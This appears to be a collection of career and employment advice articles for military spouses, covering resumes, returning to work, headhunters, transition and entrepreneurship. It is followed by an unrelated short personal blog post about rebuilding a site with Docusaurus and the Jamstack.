For example, make a pact with yourself to review your resume every year on the day after your birthday. Or plan to review it every six months. Whatever you decide, be consistent and have it on your calendar as a must-do item.
You owe it to yourself. Within the scope of one year, your skills have grown. You have new professional experiences that need to be captured on your resume if you intend to remain competitive.
You’ll realize the true benefit of routine maintenance when you want to apply for a job and you don’t need to spend an insane amount of time updating your resume.
TARGETING YOUR RESUME FOR A SPECIFIC JOB
You have found the perfect job and now all you have to do is convince the employer to give you an interview. A killer resume, targeted specifically to that job, may well be just what you need to make that interview a reality.
Gather all the information you possibly can about the job you want. What skills are they seeking? Credentials? Experiences? Highlight those keywords you see in the announcement. You may even know someone on the inside who can offer you unpublished details.
Compare the job you want with the content on your existing resume. Do you see an obvious fit or not? Look critically at your resume as though you were the employer. Would you hire you?
Enhance the fit. Assuming you are not already a perfect match for the job on paper, then work to get as close to that point as you can, skill by skill.
Let’s say you are applying for a budget analyst job but you’ve never been a budget analyst. You have, however, worked in a job where you had some significant fiscal responsibilities.
Your mission, then, becomes showing how what you have done in those other jobs is akin to what you can do in relationship to the job you want.
For example, the job vacancy announcement says you have to be able to develop and coordinate budget submissions and justifications. Maybe you didn’t do that every single day in past jobs, but you did do it or something like it annually in one of them. Expand upon that point in the appropriate work narrative.
To effectively update your resume and target it to the job you want, repeat that process for every skill desired by the employer.
You will either be able to directly or indirectly address the skills or not. Whatever you write in an effort to show the fit to an employer, be able to back it up 100%.
Throw the thesaurus away. Don’t reach for fancy words. Use the same ones that are used in the job vacancy announcement or within that industry to show your familiarity with the career field, assuming you have it.
Janet Farley serves as a NMSN subject matter expert and she is the author of The Military Spouse’s Employment Guide: Smart Job Choices for Mobile Lifestyles (Impact Publications, 2012). For more military spouse employment tips and thoughts, follow her @Smartjobchoices on Twitter.
Length matters. Consider the employer before you expand your resume past two pages. If you are targeting a job within the federal government, go into adequate detail and don’t stress over how many pages it takes. Stress over the content. The average federal resume is four to five pages long. If you have a ten or more page resume, then you probably said too much. If you are targeting a job in the private sector, keep it to no more than two pages unless instructed otherwise by the employer.
Highlight the skills you have to offer. Don’t get caught up in all the skills, abilities or experiences that you don’t have. Instead, sell what you do have. It’s you. If you’re not happy with what you have to offer, then that is a different situation requiring different action.
THE HOUSE IS MESSIER AND I Don’t Care
by Carol Fishman Cohen
Ten years ago when Vivian Steir Rabin and I were doing the research for our career reentry strategy book Back on the Career Track (Hachette, 2007, Amazon 2011), we conducted over one hundred in-depth interviews to understand every detail about transitioning back to work after an extended career break. At the time, we focused primarily on moms returning to work after career breaks for child care reasons. Both Vivian and I returned to work after our own career breaks at home with children, but we didn’t want to rely only on our experiences. The discussion of managing day-to-day logistics upon returning to work brought out excellent and sometimes humorous responses. From household cleanliness, to lack of personal time, to the realities of carpools and childcare, return-to-work moms give us frank and helpful advice.
HOUSEHOLD CLEANLINESS “My house is messier and I don’t care!” “You’ve got to let go of domestic perfection.” “I feel that if I am working, things that are undone at home really don’t bother me as much. Like those pictures that have been leaning against the wall for the last two years that need to be hung.”
The chorus of voices citing the lowering of household cleanliness standards came across loud and clear. When moms returned to work, they decided to be less picky about how clean their houses were and they were much happier for it.
ANOTHER PERSPECTIVE “Since I went back the household stuff is definitely more out of control. Now we all rush out of the house at the same time, and there is no one to clean up the dishes and food left on the table. Beds are unmade. There’s no one to go around and straighten up and clean. This is especially hard when my mother-in-law is visiting. She tends to judge me by how I keep or do not keep up the house.”
You’ve got to let go of domestic perfection.
CHILDCARE “I needed coverage from 4:45 to 6:00 pm every day, which was the gap between when the kids got home and when I got home. I found two thirteen-and-a-half-year-old girls in my neighborhood who were best friends to provide this coverage. They guaranteed that one of them would be available to cover this time slot every day. They were there, without fail, every afternoon for two years. I could never have done this without them.”
CARPOOLS “We were in lots of carpools, and with six kids, both of us drove them. Our deal with the other parents was O’Briens would do the morning carpools, and other families would do the afternoon. Sometimes I’d be at a corner dropping off three of the kids, and I’d see Tom whizzing by with his car pool!”
(Note: This quote is from Ruth Reardon O’Brien, Conan’s mom, who has the most amazing relaunch success story from the 1970s. This quote was from an interview of Reardon O’Brien by Heather Peddie in an account originally for the Stanford Law School Women’s Legal History Biography Project. I also interviewed Ruth Reardon O’Brien.)
MEAL PREPARATION “I do a lot of Crock-Pot cooking. One night a week we have sandwiches for dinner. One night a week we have what we call ‘Sonoma Night’; a cold meal with cheese, fruit, bread, boiled eggs, cold veggies, leftovers. We barbecue a lot. Sometimes the kids make dinner on their own with canned soup, frozen dinners and fresh fruit.”
“We have a lot of pasta for dinner now, or eggs, or even cereal and fruit when I can’t get around to making anything.”
TIME MANAGEMENT “What I sacrifice is personal time. My out-of-work peer relationships are gone. I never see my women friends anymore. Exercise is really reduced or gone. That’s an okay trade-off for me right now. Some of my social needs are met at the office.”
“Donna’s decision to go back to school and then to take a position as an ESL teacher caused drastic changes in the routines of her son and daughter. She worked only four hours a day, Monday through Friday, but she had to leave for work right after her son’s wake up time. (Her 14 year old daughter left for the school bus before her son woke up.) Her 11 year old son had to make his breakfast, set the alarm, lock the house, and get himself to the bus all on his own. He was only in fifth grade. Her friends couldn’t believe she would let him do this, but Donna felt he was mature enough to handle it.”
“It takes a monumentally important event for me to be out on a weeknight. I say no to almost every evening request for my time, whether it be a fund-raising event, dinner with friends, or a college alumni get-together. I will admit I made an exception for the Paul McCartney concert!”
KIDS GAINING INDEPENDENCE “We told the kids they were each responsible for making dinner one night a week. This included coming up with the ingredient list in time for our once a week grocery shopping trip on Sundays. It didn’t matter if boiled pasta and water were being served, as long as something was planned. At first my seventh grade son balked, but he later became quite possessive of ‘his’ dinner night.”
How returning to work feels “in the moment” (quote from a relauncher one month before she went back): “I’m feeling tremendous uncertainty, a tremendous urgency before I get everything in place before I start work again. Now I’m realizing all the roles I really had. [We had a family meeting.] I told the kids they owed the family 30 minutes of helping-out time every day.”
“…I was nervous about how they would manage without me. Fed up one morning, I decided to take…inaction. I stayed in bed and let the children run through the morning routine themselves. Well, the kids (ages 13 and 10) made their breakfasts and lunches themselves and left on their own. It was a lesson to me. It was as if someone turned the light on. I realized that a 10 year old making her own breakfast and going to the bus by herself can be a good thing. She’s developing competencies she wouldn’t have developed if I were always around. I think about it in terms of competencies developed in the absence or presence of parents.”
(Note: This relauncher has now been back at work for ten years.)
I hope you find these quotes and anecdotes as inspiring and instructive as I do. This wisdom could only come from moms who have lived through a return to work—no sugar-coating here! For more advice and information about returning to work after a career break, consult the resources at iRelaunch.com
Carol Fishman Cohen is a globally recognized expert on career-reentry strategy. She is co-author of Back on the Career Track: A Guide for Stay-at-Home Moms Who Want to Return to Work and co-founder of iRelaunch.
FIRST IMPRESSIONS Do Matter by Joyce Neave
You never know who you are going to meet. Think of yourself as a walking billboard. The way you present yourself is how people connect to you. Do your clothes fit you well? Are they clean and pressed? Studies show that people have confidence in individuals who take pride in the way they dress. This does not mean that you have to break the bank to look good. It means that your clothes are the right size and tailored to fit your body. It means you’re dressed appropriately for the situation. For example, it means that you wear closed toe shoes to a job fair, and save the flip flops for the beach.
Dressing well and appropriately tells the world that you are a good decision maker; that you have good judgment. This will not only build people’s confidence in you at the work place but in every setting. Most importantly, you will feel good about yourself.
Businesses want to hire people who will represent their company well. Ask yourself, “Do I reflect their brand?” What you wear to work shows how you feel about the company. Do you show up fresh and ready to do your job? Do your clothes convey that you are part of the team? Everyone wants to express themselves and be heard. In a business setting, this is achieved by your ideas, not your clothing. Companies have reputations. Intelligent, well-mannered, well-dressed employees make the company look good. Save your creative dressing for the weekend.
TIPS ON PRESENTING YOURSELF WELL
• When shopping for your work attire, it’s best to simplify. Basic suiting in solid colors should be made well and tailored to fit your body.
• Take care of your clothing by dry cleaning your suits. In between trips to the cleaners, try steaming your suits with an electric steamer. You can purchase a free standing or hand held steamer. This will take out the wrinkles and keep your clothing smelling fresh.
• Shirts/tops should be free of tears, snags, stains and should always smell fresh. Cologne will not take away body odor or food smells and definitely not the smell of smoke. It will only smell worse.
• Practice good personal hygiene. Bathe regularly, use deodorant, brush your teeth and visit your dentist for regular cleanings. Be well groomed. Nails should be trimmed and clean. If you wear polish, chipped polish should be repainted or removed. Hair should be groomed and clean when you arrive at work.
• Shoes should always be clean and polished, and heels and soles should be repaired when needed.
• Keep jewelry to a minimum and avoid jewelry that jingles.
• If you’re working in a more conservative setting, tattoos and piercings should be covered in the work place until you’re more familiar with the culture of the company and get a better handle on what’s acceptable.
This is a topic that is worth revisiting often. Why? Because it can change your life. Though that sounds dramatic, it’s actually true. First impressions DO matter. Following these tips will get you in the door. Once you’re in, your hard work and best efforts will speak for themselves.
PUT YOUR BEST Foot Forward by Amy Schofield, ACRW
Military spouses may be faced with numerous employment challenges. Multiple moves typically result in searching for new jobs, possible gaps on resumes, and potential certification issues. Because of this, military spouses often have a difficult time obtaining employment, making it even more important for military spouses to put their best foot forward on their resume.
BELOW ARE TEN RESUME TIPS TO HELP YOU GET IN THE DOOR:
1. Adapt your resume to each position you’re applying to.
2. Make sure you understand what each employer is looking for and that your resume clearly highlights the specific skills and experiences that the employer is seeking.
3. Review your resume to ensure you are highlighting your strongest accomplishments that set you apart from other job applicants.
4. Address any gaps. As a military spouse, you may have additional gaps from moving around, so ensure you address these gaps. Volunteering is one great way to address any potential gaps.
5. Choose quality over quantity. It is generally better to send 10 tailored resumes than to apply to 100 jobs using a general resume.
Amy Schofield is the founder of Schofield Strategies [http://schofieldstrategies.com/].
6. Know how to get past applicant tracking systems. Use proper key words for the type of job you are applying to.
7. Never use your email address with your current employer on your resume. (And speaking of email addresses, make sure that the one you are using is professional).
8. Do not include your physical street address, city, state, or zip code if you are applying to a job in your new duty location and you do not have an address there yet. (So, ONLY include your address if you are applying to a local position).
9. Before sending your resume, proofread it. And then proofread it again. Be sure your resume is 100% error-free.
10. Honesty is critical! Never, never, never lie on your resume.
Adapt your resume to each position you’re applying to.
Remember, the goal of your resume is to put your best foot forward – let the employer know why they want YOU over another job applicant. Make sure you place more emphasis on your actual job accomplishments, tailor your resume for each position you apply to, use industry lingo, and proofread (and then proofread again!).
THE MORE You Know
by Matt Zemon
Every entrepreneur starts his or her business from square one, just like you. Once started, all of their time and energy goes into growing the business.
As the entrepreneur-in-residence for the National Military Spouse Network, I am always looking for ways to help military spouses start or grow businesses. An important resource for me has been the Entrepreneurs’ Organization (EO). This organization provides small accountability forums and knowledge sharing for entrepreneurs around the world. (For those of you with $1 million or more of annual revenue, check them out!)
This month I am offering some suggested reading for military spouse entrepreneurs. The books are written by thought leaders who were introduced to me through EO and cover a variety of topics that can help entrepreneurs of any size. Getting back to square one, let’s start with the beginning of a business. Sound planning can make or break a new company, but it doesn’t have to be daunting. The three sources I cite on this subject offer great suggestions and tools. Eric Ries is the creator of The Lean Startup and he offers a process to empower entrepreneurs to make better business decisions faster. His scientific
approach to creating and managing startups streamlines the process. The Startup of You focuses on the human side of entrepreneurship. Reid Hoffman, co-founder and chairman of LinkedIn, and Ben Casnocha, an entrepreneur and author, cover the mindset and skill set that are needed by today’s startups. Business Model Generation by Alexander Osterwalder and Yves Pigneur takes a colorful and visual approach to strategy and planning. Their Business Model Canvas is a simple but effective template that allows you to create a customized model of your business, whether it is a startup or a going concern.
Once you are confident about your plan, the management elements needed to execute it should receive your thoughtful attention. Once again, there are many sources of information that can be helpful. Mastering the Rockefeller Habits: What You Must Do to Increase the Value of Your Growing Firm, by Verne Harnish, gets back to the fundamental best practices you can use to gain focus and align employees and vendors. His one-page Checklist and a number of other resources and helpful videos are available online.
Hiring great people isn’t easy, but it doesn’t have to be hard. Geoff Smart and Randy Street wrote a fantastic book called Who that can help anyone make better hiring decisions.
Once you have hired employees, don’t forget to spend time on your company culture. Define what the company stands for and what is expected of every member. Peak: How Great Companies Get Their Mojo from Maslow, by Chip Conley is a great look at what motivates employees, customers, bosses and investors. He provides ideas on how to use that knowledge to strengthen relationships. Those relationships are at the core of a strong and profitable business.
When it comes to generating business, there is a lot of advice out there about promotion. Seth Godin has written a number of great books including Purple Cow, New Edition: Transform Your Business by Being Remarkable, which identifies what makes a product/company noticeable in a sea of marketing messages. In Double Double: How To Double Your Revenue and Profit in 3 Years Or Less, Cameron Herold addresses the three steps to success: Planning, Building and Leading. As the former COO of 1-800-GOT-JUNK?, he played a key role in building a great company. One key element for his company was generating free media exposure through an inexpensive public relations strategy, which he describes in detail in Double Double.
Sound planning can make or break a new company.
A well-known trait common to entrepreneurs is a thirst for learning. I hope these reading suggestions will quench your thirst for a little while.
TRANSITION by Sue Hoppin
Toward the end of August, I had the honor of participating in the #morethanaspouse Facebook party hosted by the National Military Family Association. By the time the party was over, I had answered nearly 300 questions on everything from careers and entrepreneurship to transition. An hour wasn’t quite long enough to share all the tips and thoughts about successfully transitioning out of the military lifestyle, so I wanted to follow up with a wrap-up and throw in some other tips gleaned from our own transition a little over two years ago.
TIPS FOR A SUCCESSFUL TRANSITION (LEARNED THE HARD WAY)
Don’t kid yourself—you’re BOTH transitioning. Your service member spouse is leaving the military and you are leaving the active duty lifestyle. There’s a lot of fear and anxiety that comes with that. The good news is, it’s normal. Take it easy on yourself and understand that this is a very stressful time overall. Do what you can to be proactive. Attend the transition seminar together. Up until now, you’ve been the ultimate intel gatherer/gatekeeper—transition is no different. You’d be amazed at how much information is thrown at you during those seminars. It doesn’t hurt to take the team approach and compare notes at the end of the day.
Take advantage of all the employment resources on the installation while you can. Many of the resources and programs you’re used to are not available to retirees or veterans and their dependents, so make sure you get those appointments and counseling sessions in while you can.
Understand your benefits. The Survivor Benefit Plan is just the tip of the iceberg. You should review your other benefits such as TriCare and dental to make sure you understand how your new coverage will work once you transition.
Update your resume. Even if you have no interest in working, you never know when an opportunity might arise and you want to be ready. Don’t wait until you need it to get your resume ready. Be proactive!
Make sure your finances are in order. Many people recommend having six months’ living expenses readily available for post-transition life. Try to have at least three to four months’ worth of living expenses available to alleviate undue stress. This means, start as early as you can to put away that fund. If you maintained residency in a state that didn’t tax personal income while on active status, but are now establishing residency in one that does, it can be jarring. It takes some time post transition to get used to the fees and taxes of settling into your new state of residency. We’re a little over two years into our transition and just now feel like we’ve acclimated to our new financial reality. It takes time. And it’s stressful. The only way to mitigate that stress is to be prepared.
Order networking cards. Companies like Vistaprint are constantly running sales, so you can get hundreds of networking cards for a song. Not sure where you’ll be living post transition? No worries, just leave the address off. You’ll want to have networking cards handy as you start meeting people.
Start or update your LinkedIn profile. LinkedIn is a great way to stay in touch with all of your contacts in a professional manner.
Start attending career fairs together a couple of years before the transition. You want to get that dress rehearsal in before it counts. Consider it a reconnaissance mission—it’s good to get the lay of the land and figure out how to interact effectively with recruiters before it counts. It’s also a great way to gauge what kind of opportunities are out there and which employers are actively seeking to hire veterans and military spouses.
You’re BOTH transitioning. Your service member spouse is leaving the military and you are leaving the active duty lifestyle. There’s a lot of fear and anxiety that comes with that. The good news is, it’s normal.
Network, network, network. Network not just for that next career opportunity, but also to find your “tribe”. Find those people who have recently transitioned who can offer some fresh insights because they have just gone through it. They’re going to become your new lifeline because they have successfully navigated the transition. They’ll be a great reminder for you – there IS life after the military. You’re going to be stressed, scared and anxious, but it will pass. These are just tips to get you started. If you have any to add, drop them in the comments of the blog post. If you’re going through transition soon, think about joining us for our summit (www.milspousesummit.com) in November, particularly the Networking event on the 13th that will be focused on a Successful Transition. Service member spouses are more than welcome. It’s a great, low-threat environment where you can relax and speak to military-friendly employers and others who are either going through the transition themselves or have recently successfully transitioned. Hope to see you there!
Sue Hoppin is the founder and president of the National Military Spouse Network, a consultant on military family issues and the co-author.
USE YOUR B.R.A.I.N. by Carol Bowser, JD
The B.R.A.I.N. technique takes the best negotiation, collaboration, and problem solving techniques and literally puts them at your fingertips. 5 fingers. 5 points. Here we go:
B = BENEFITS
Think of all of the benefits to you in taking a specific course of action. I mean all of the benefits: emotional, spiritual, professional, and financial. If the idea impacts your work, what are the potential benefits to the employer? What are the potential benefits to society as a whole? Quickly write all of the benefits down.
R = RISKS
Think of all the risks associated with that same course of action. Again, these are all types of risks: time, emotional risks, financial risks, risks to the family, risk to an employer or to a team.
A = ALTERNATIVES
What are alternative courses of action that could achieve the same or nearly the same results? This is the time to write down even the wildest, least feasible ideas. If you can’t think of alternatives, describe the situation to someone who is not involved and write down their ideas. You aren’t at the place to make a decision yet, so don’t worry about committing to any alternatives. You are merely brainstorming.
B.R.A.I.N. allows everyone to be heard, have their say, and come to a decision..
I = INTUITION Now it is time to check in with your gut. What does your gut tell you? Do you like the idea? Are you having a bad or uneasy feeling about it? Your intuition is a valuable tool. Don’t discount it.
N = NOTHING Yes, nothing. What would happen if you did nothing? What would happen if you delayed a little? Nothing is an option. It may not be a viable option or it may be the best option. Sometimes maintaining the status quo is perfectly fine. After running thought the B.R.A.I.N. analysis you are ready to present your ideas. You can confidently say, “I have thought of the Benefits, Risks, and Alternatives in the situation. Did a gut check and here is where I land.” Now, if someone comes to you with an idea, you can help yourself come to a wellreasoned decision by having that person walk you through the B.R.A.I.N. analysis. For example: “Ok, so you want to do (fill in the blank), can you walk me through the benefits of that? What do you see as the Risks? What alternatives did you think of? What does your gut say? What might happen if we put off the decision for a little while?”
Visit us online at
33
WORKING WITH
Head Hunters by Julie Waters
Headhunters can be a valuable tool in your employment search. Since I personally have never had the opportunity to work with a headhunter, when prepping for this article, I sat down with Corinda Behler-Howe, Branch Manager for Office Team, a division of Robert Half International. From their own website, Robert Half International's "specialized staffing divisions place professionals in the finance and accounting, information technology, legal, administrative, and marketing and creative industries." Office Team specializes in placing highly skilled office and administrative support professionals.

JW: Let's start with the basics. What is a headhunter?

CBH: On a very basic level a headhunter is a person who can help you find a job. On a deeper level, a headhunter or recruiter is one more resource to help you in your employment search. As recruiters have connections with organizations looking for the right applicant, working with them helps expand your pool of opportunities.

JW: What types of professions typically run through a headhunting firm or placement agency?

CBH: Agencies specialize in finding the right fit, like those hard to find candidates with specific requirements as communicated by the company, so you'll find that they are looking to fill jobs in all types of professions. Headhunters were traditionally used for direct placement positions, hiring employed people away from their current companies, but now they are more associated with temp-to-hire or contract positions. Though agencies do not typically handle entry level placements, there are plenty of those positions available at a professional level, to include C-level positions.

JW: How does a headhunter do the job? And what about the timeline?

CBH: It is a recruiter's job to build relationships on both sides of the process. On the job seeker side it would begin with interviewing prospective candidates to find the right fit for an organization's needs. Keep in mind that each communication with the candidate is part of the interview: all phone calls, e-mail exchanges, even your interaction with the receptionist is part of the big picture process. Getting to know the candidates and building that relationship will make for a better placement. I've found that cultural fit is just as important as specific experience.

As far as the timeline, I don't think there is a "normal" process anymore. It depends on the flexibility of both the applicant and the company; it depends on how deep into the process the company wants the headhunter to go. Some just want an initial screening and interview and then the company decides to do multiple rounds of interviews. Others want the recruiter to narrow the pool down to the final few candidates. Using a headhunter firm or agency puts that old school feeling back in the mix, that face-to-face personal touch of the process being about the person, not the resume.

JW: Where would I find a headhunter or recruiter?

CBH: The same places you would look for jobs: the internet, phone book, your local chamber, even the base placement office. Your best bet however is a networking event that correlates with the types of positions in which you would be interested. For example, the ASWA (American Society of Women Accountants) if that is your specialty.

JW: What does the fee structure look like?

CBH: Predominantly the candidate does not pay a fee. The recruiter gets compensated by the company. If it is a temp-to-hire or a contract position there is an hourly billing rate and a placement fee. For direct placement a fee is negotiated between the agency and the company.
As a follow up to talking with Corinda, I had a discussion with a friend of mine who has been "hunted." Michele Chapman is Director, Sales Operations for Philips Healthcare North America. She has a Bachelor's Degree in Organizational Leadership from Penn State. Michele is a military brat whose father was career Air Force. It was an interesting experience for her because in her case, it was a call from a headhunter that came out of the blue.

JW: How did the headhunter find you?

MC: She found me on LinkedIn. The recruiter cold-called me after I had listed my experience and skills.

JW: What did you like best about the process? And what did you like the least?

MC: I liked that they had a specific job that fit my skills instead of me trying to find jobs that would interest me. What I liked least: my recruiter had poor follow up about the interview and after the interview.

JW: Given your experience, if you can put yourself in the shoes of a military spouse, would you recommend seeking out a headhunter as a tool for their job search?

MC: Yes, as long as they don't have any monetary obligation to the headhunter. The headhunters are paid by the companies to place you and you shouldn't be paying them. It also shouldn't be their only avenue to get a job. They should be networking and seeking out opportunities independently.

Michele just confirmed my perspective, that using a headhunter, recruiter or placement agency should only be part of your job search. You can't just drop off a resume and expect them to call you with your dream job. You need to be proactive with them and continue your other methods of searching.

Another important thing to take away from meeting with a recruiter is that he or she is a person in your new city who has an extensive network. Even if you don't end up using their services, that person could still serve as a valuable resource. If there are long-term contract positions available in your area you will be more likely to find them through a placement agency; access to those positions may only open up through contact with the recruiter.

I would also recommend using an agency or recruiter that has been around for a few years. If a person does a poor job of finding that elusive "fit" they won't last long in the business. The people that have been there for a little while are probably pretty good at it.

Julie was lucky enough to choose a career that easily transfers between employers as her husband's assignments moved them from city to city. She holds a special interest in career building for military spouses as she feels it is important to have something personal outside of our military lifestyle.
UTILIZING
Bloggers by Greta Perry
This post was originally written in 2011 for NMSN and it still is extremely relevant in 2015. Just this past week, my personal online presence (blog and social media) has opened a gateway to do some work with Travelocity; I even have my own Travelling Gnome. At the same time, I am also contacting bloggers on behalf of an author/client. While this post has been mildly tweaked since the first draft, the importance of bloggers in marketing has only increased over time.

Blogs are an often overlooked entity for marketing and advertising a brand or product. According to Wikipedia (one of the only sources with current blog info), on 20 February 2014 there were around 172 million Tumblr and 75.8 million WordPress blogs. Large companies such as Sears and USAA have realized the value bloggers can bring to their companies and actively engage them. Mike Kelly, Executive Director USAA Stakeholder Management & Mobilization, stated in 2011, when this article was originally published, that "Over the last several years we've seen bloggers grow in influence and impact within the military community, playing a significant role helping educate and inform USAA's military members and their families about valuable benefits and how they can make healthy financial decisions." Augie Ray, Executive Director USAA Communities & Collaboration, said at the same time, "Our members trust bloggers to be objective sources of information, and so do we!"

If companies who can afford high dollar traditional media ads place a significant amount of energy into the blogging community, then others should certainly follow suit. Whether someone runs a blog for fun or to supplement their income (few actually use it for their primary source of income), blogs are out there for you to use to your advantage, if approached properly. Taking out an ad or offering a free product, service for review, or event tickets is the best way to establish a business relationship with a blogger. Below are steps that will help you to achieve this successfully.

Identify a blog whose audience reaches your targeted demographics: age, gender, area of interest, location.

Carefully read over the blog to make sure you want your business affiliated with it. Note how long they have been blogging and how consistent they are. Take note if the blog currently offers individual advertisements, not just Google, Amazon, etc. ads on their site. Check to see if they have an existing ad or promotion policy.

Determine if you will offer something of value to the blogger and/or if an ad is the preferred method of contacting them. Approach with caution, as it only takes a second for a blogger to delete your request and time to answer it. You must stand out from the moment of contact. Decide what your advertising budget is ahead of time. Most blogs will want 6 months of an ad purchased at a time. If they do not have any ads, you could offer them shorter periods of time. Most would love some money closer to the holidays, so now is a great time to make offers.

Have several graphic sidebar ads of varying sizes ready, or just start by using a sidebar text ad.

Check out the blog's related social media presence, as this may be of added value to your purchase. You can often work social media promotions into your agreement. There is a chance at some point, that if the blogger likes your product or service, he or she may write about it or promote it on other social media platforms, an unexpected benefit. Good luck and remember, first impressions with bloggers are of the utmost importance.
A CONVERSATION WITH
Pam Allen by Shelley Kimball
Two Coast Guard spouses from different generations shared their experiences trying to maintain careers while moving regularly: one who kept her career intact while her husband served for nearly 40 years and the other still working to keep her career afloat.

Pam Allen, whose husband, Thad Allen, retired as the 23rd commandant of the Coast Guard, maintained a career first as a math teacher, then as an academic advisor at the university level. She decided to switch careers and go to graduate school to study college counseling and student development because she saw so many military spouses struggling for employment. Throughout those years, she took part-time positions that turned into full-time positions, from advising university students to directing academic advising and career counseling centers.

Shelley Kimball has been a Coast Guard spouse for 15 years and is trying to maintain her career while moving regularly. She has worked as a university professor of media law, both part time and full time, as well as a researcher for nonprofits that serve military families.

At the time of the conversation, Allen was considering coming out of retirement to take a new position with George Mason University in Northern Virginia, developing a program that helps students get the most out of their university experiences by encouraging them to supplement their progression through school with work and classes that will give them better career opportunities. As she was considering taking the job, she said she was still experiencing many of the feelings she did when facing a new job as a military spouse.

PA: I'll tell you, the same thing happens right now in this decision that happened each time we had to move and find a new job, and that's insecurities. It's something I believe that a lot of military spouses have to conquer every single time. They get better, hopefully, every time they get further on in their careers, but it's something that stops many people from going any further.

Back at the very beginning, finding that next step wasn't necessarily easy. The Green Sheet [a hardcopy list of Coast Guard information that was mailed out] was something we could get information from, but trying to figure out how or who could give you that information was basically you stumbling along.

"Sometimes you don't feel like you have a choice, but you've always had a choice to take what you were given and do what you can with it."

SK: I can completely relate. Sometimes I feel like I'm pretending, or I'm a fraud, or is this really the job I'm supposed to have? Or even applying to every job, feeling like I'm not sure.

For the current job I have, I was drafting an email, just cold calling, saying my husband had orders, we would likely be in the area, and asking if there were any job openings. When I was about to send that email, I literally sat there telling myself, "You just have to press send. Just press send. Be brave, press send." Because I thought, am I good enough? Are they going to laugh this off? Am I the right fit? So I just pressed send, and the path started. I ended up getting a job teaching at George Washington University from that email, but it was scary.

PA: And for people that don't have that confidence, and I think everybody does to some extent, but for some for whom this is really immobilizing, go and search for help to get that one step that you need in order to go to the next level.

SK: Maybe that's the difference now between us. In your time of doing this, you were going to paper and trying to find human beings, where I am Googling. I'm using LinkedIn, I'm emailing. And so for me, it's really probably 20 minutes at a computer to find my pathway. But for you, I don't even know how long it would have taken you to track down even the person to send the letter to.

PA: You'd go through papers, and you'd look through the want ads. Does anybody use the want ads now? It was highly frustrating and unproductive.

Becoming a career counselor, I discovered all these resources that are out there that I didn't know existed. I bet you if you go and work with some of the spouses, they don't know it's there. They don't know where to look. Or they looked once and it wasn't good for them so they never went back to look at it. You just have to keep checking back. Or you have to ask if you don't find it because it probably is there, and somebody's going to help you find the right place to look.

Throughout both of their careers, they have taken jobs at higher ends of their careers, and then when a move came, they would start back at the bottom.

PA: And when you do that, you sit there and say, "How do I tell people I used to be an associate director? Why would they want to hire me in a lower position?" And so with our military moving situation, I'd have people send references of individuals that showed that I work with everybody else. Send letters from people who can tell you that as an advisor, I work just as effectively as a director.

SK: I'm having the same career experience. I was director of the print program of the journalism department at a university, then I couldn't find a job at the next duty station.

So I really had to change my perspective. I feel like I broke apart my skill set. I thought, what do I enjoy? If I'm sitting in my office all day, what are the things I'm wishing I were doing instead of sitting at a desk? Research and working more with military families were two of the priorities. I guess I was gifted with unemployment because I started doing research for military family nonprofits, and it filled that void for me.

When we were getting ready to transfer again, I really felt awful about starting over. I was tired. That's when I sent that email: just be brave and press send. And what came back was a part-time opening teaching directly in my field. And so, though it's lower in stature than my old position, I'm still so happy and satisfied. I'm with the students teaching what I love. Maybe this will be the seed to the larger thing, like your part-time jobs were. And instead of saying no to the smaller position, maybe something else will come.

PA: You should always do that. And what you bring each time. There's a life after all the moves.

SK: I'm totally of the same mind. My career has become such a patchwork I feel like I need to explain why I am always someplace different. It's not a work issue, it's a life issue.

Both have tackled the question, "Do I reveal that I am a military spouse?"

SK: When you were applying for jobs and interviewing, did you always say you were a spouse?

PA: That is a very interesting question. Yes. And not only that, I made it an issue. I would say in my cover letter quite often, I am a trailing spouse, and my husband is being transferred to this particular area, and I am very interested in your position. I would say this up front because the worst thing is that they could get you in there, and then they find out. I've always been up front.

In some cases it's beneficial. One of the things I think everyone should say is what I bring to every new organization is the ability to look at it with new eyes. I could bring in change. I come with a wealth of information about all of the possibilities that are out there and hopefully we can work with what is there and make it a better organization. That's a pretty big selling point. What you get with a military spouse is consistency. We don't tend to flip from job to job because we are only here for a few years.

SK: I feel that, too. I feel dishonest if I don't say.

PA: You don't appear to be hiding anything if you do that. They are looking for dishonesty. When you don't put your times of work experience, dates, why aren't you doing that? You are trying to hide something. It's better to put them down there. And I help people write their resumes, and I say if you change a lot, if you don't put the dates down there, they say, "What is she trying to hide?" It's an honesty issue that I think is to your benefit.

SK: And what do you think are the most valuable parts of all of this? What do you think are the strongest things to have when looking for a position as a spouse? Experience, honesty, enthusiasm, work ethic, education? Are there any that weigh more?

PA: Adaptability is probably what we have more than others. We must be go-getters. We're out there getting a new job every two to three years. We must be able to adapt and do well. Adaptability. Change. I think those are the things that you need to show, say, in a cover letter for those who are asking for cover letters. And have somebody look at your cover letter. Know what to say and how to say it, and not in 10 pages.

SK: Are there positive aspects to moving?

PA: I think it's positive because you move. It isn't a negative. It feels negative. It feels really negative. Believe me, I've cried when I didn't get a response just like everybody else. I went through the whole thing, but moving actually is a positive. If you don't like where you are working, you know you are eventually going on to the next, possibly better, job. If you do like where you are working, you still could be going on to the next better job with experiences the new organization wants. Is it easy? No. There's a lot of work involved in it. And I'll admit, sometimes I was lazy. I was just tired of working and putting myself out there. But you have to work on sharing your passion and excitement to make the best impression. I am who I am because of what has happened. In reality, everyone is. So you've always had a choice, all along the way. Sometimes you don't feel like you have a choice, but you've always had a choice to take what you were given and do what you can with it. I think I learned this from my husband. I asked him, "How do you get to be an admiral?" And he says, "Take whatever job you have, and make the best out of that job, even though it may not be the one you want at that particular time. Because the next step could be that opportunity." Is there a silver lining? And it happens. It does happen. Even with military spouses.
NATIONALMILITARYSPOUSENETWORK.ORG
Starting my blog again
So this is my blog, rebuilt again.

After all these years of redoing it again and again, going from Joomla, WordPress, Angular, and a lot of different flavors, I am redoing it again using the latest and greatest from the Jamstack (or so they say).

But the question remains: why?

So what's behind the idea of rebuilding the blog and site again?

Well, first, to explore new technologies and apply them to my day to day, and second, I always wanted some sort of easy, simple way of working with my site that did not bring more administration overhead.

So, welcome Jamstack: in this case I am using Docusaurus, some React, and a simple CI/CD chain to be able to manage, update and push changes to the site.

Some of my requirements for this project were:

- Easy peasy lemon squeezy: simple to maintain.
- A simple, easy way to manage my blog and public documents.
- Fast, fast, fast, as fast as possible.
- As cheap as possible.
- Somewhere I can play with all my tools (Angular, React, Vue.js, CI/CD, and other wonders).
- Somewhere I can add and share code, images and live examples (see the example at the bottom).
- Somewhere I can maintain a document base of all that I am studying, reviewing and investigating, and that can help others (so it is public).
- A place to have my CV visible online, with something like a portfolio and an easy contact-me page.

So let's see what happens; more to come.

